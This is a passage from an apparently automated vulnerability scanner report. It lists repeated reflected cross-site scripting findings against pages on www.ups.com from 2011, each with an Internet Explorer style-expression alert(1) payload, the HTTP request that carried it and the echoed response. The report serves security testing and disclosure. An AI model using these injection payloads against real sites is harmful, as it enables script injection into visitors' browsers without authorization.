The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a12"style%3d"x%3aexpression(alert(1))"cb99259b504 was submitted in the REST URL parameter 2. This input was echoed as 98a12"style="x:expression(alert(1))"cb99259b504 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us98a12"style%3d"x%3aexpression(alert(1))"cb99259b504/en/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us98a12"style="x:expression(alert(1))"cb99259b504/en/resources/ship/fraud.html">
...[SNIP]...

1.365. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4 was submitted in the REST URL parameter 3. This input was echoed as 429db"style="x:expression(alert(1))"4ada58a2fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en429db"style%3d"x%3aexpression(alert(1))"4ada58a2fc4/resources/ship/fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:17 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en429db"style="x:expression(alert(1))"4ada58a2fc4/resources/ship/fraud.html">
...[SNIP]...

1.366. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0 was submitted in the REST URL parameter 2. This input was echoed as 7790d"style="x:expression(alert(1))"6af3f34d8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us7790d"style%3d"x%3aexpression(alert(1))"6af3f34d8c0/en/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us7790d"style="x:expression(alert(1))"6af3f34d8c0/en/resources/ship/index.html">
...[SNIP]...

1.367. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb was submitted in the REST URL parameter 3. This input was echoed as 38e38"style="x:expression(alert(1))"dfe01cfd7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en38e38"style%3d"x%3aexpression(alert(1))"dfe01cfd7cb/resources/ship/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55206

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en38e38"style="x:expression(alert(1))"dfe01cfd7cb/resources/ship/index.html">
...[SNIP]...

1.368. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2 was submitted in the REST URL parameter 2. This input was echoed as be5e8"style="x:expression(alert(1))"2bd8dfca6c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usbe5e8"style%3d"x%3aexpression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50161

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usbe5e8"style="x:expression(alert(1))"2bd8dfca6c2/en/resources/ship/terms/privacy.html">
...[SNIP]...

1.369. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/terms/privacy.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d was submitted in the REST URL parameter 3. This input was echoed as 2efc9"style="x:expression(alert(1))"e2d5151843d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en2efc9"style%3d"x%3aexpression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:16 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2efc9"style="x:expression(alert(1))"e2d5151843d/resources/ship/terms/privacy.html?WT.svl=Footer">
...[SNIP]...

1.370. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d was submitted in the REST URL parameter 2. This input was echoed as 1657c"style="x:expression(alert(1))"d0105cd917d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us1657c"style%3d"x%3aexpression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us1657c"style="x:expression(alert(1))"d0105cd917d/en/resources/ship/terms/shipping/index.html">
...[SNIP]...

1.371. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed was submitted in the REST URL parameter 3. This input was echoed as c72a4"style="x:expression(alert(1))"ed012a4aeed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enc72a4"style%3d"x%3aexpression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35099

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc72a4"style="x:expression(alert(1))"ed012a4aeed/resources/ship/terms/shipping/index.html">
...[SNIP]...

1.372. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db was submitted in the REST URL parameter 2. This input was echoed as 9e5ab"style="x:expression(alert(1))"1918f7292db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9e5ab"style%3d"x%3aexpression(alert(1))"1918f7292db/en/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9e5ab"style="x:expression(alert(1))"1918f7292db/en/resources/ship/terms/use.html">
...[SNIP]...

1.373. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/ship/terms/use.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e was submitted in the REST URL parameter 3. This input was echoed as 36adc"style="x:expression(alert(1))"4da2f01a87e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en36adc"style%3d"x%3aexpression(alert(1))"4da2f01a87e/resources/ship/terms/use.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 76404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en36adc"style="x:expression(alert(1))"4da2f01a87e/resources/ship/terms/use.html">
...[SNIP]...

1.374. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a was submitted in the REST URL parameter 2. This input was echoed as f4af5"style="x:expression(alert(1))"4ad883a8c4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf4af5"style%3d"x%3aexpression(alert(1))"4ad883a8c4a/en/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf4af5"style="x:expression(alert(1))"4ad883a8c4a/en/resources/start/index.html">
...[SNIP]...

1.375. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/start/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df07"style%3d"x%3aexpression(alert(1))"09777fba220 was submitted in the REST URL parameter 3. This input was echoed as 2df07"style="x:expression(alert(1))"09777fba220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en2df07"style%3d"x%3aexpression(alert(1))"09777fba220/resources/start/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42424

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en2df07"style="x:expression(alert(1))"09777fba220/resources/start/index.html">
...[SNIP]...

1.376. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc was submitted in the REST URL parameter 2. This input was echoed as 9f1df"style="x:expression(alert(1))"83776d167cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us9f1df"style%3d"x%3aexpression(alert(1))"83776d167cc/en/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9f1df"style="x:expression(alert(1))"83776d167cc/en/resources/techsupport/index.html">
...[SNIP]...

1.377. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/techsupport/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3 was submitted in the REST URL parameter 3. This input was echoed as 4ff19"style="x:expression(alert(1))"b13ed736f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en4ff19"style%3d"x%3aexpression(alert(1))"b13ed736f3/resources/techsupport/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en4ff19"style="x:expression(alert(1))"b13ed736f3/resources/techsupport/index.html">
...[SNIP]...

1.378. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef was submitted in the REST URL parameter 2. This input was echoed as f30c7"style="x:expression(alert(1))"1c7f06c7cef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usf30c7"style%3d"x%3aexpression(alert(1))"1c7f06c7cef/en/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42703

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf30c7"style="x:expression(alert(1))"1c7f06c7cef/en/resources/track/index.html">
...[SNIP]...

1.379. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/resources/track/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184 was submitted in the REST URL parameter 3. This input was echoed as 96d3c"style="x:expression(alert(1))"7996a1d6184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en96d3c"style%3d"x%3aexpression(alert(1))"7996a1d6184/resources/track/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96d3c"style="x:expression(alert(1))"7996a1d6184/resources/track/index.html">
...[SNIP]...

1.380. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033 was submitted in the REST URL parameter 2. This input was echoed as 2f8ea"style="x:expression(alert(1))"c56152e9033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us2f8ea"style%3d"x%3aexpression(alert(1))"c56152e9033/en/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
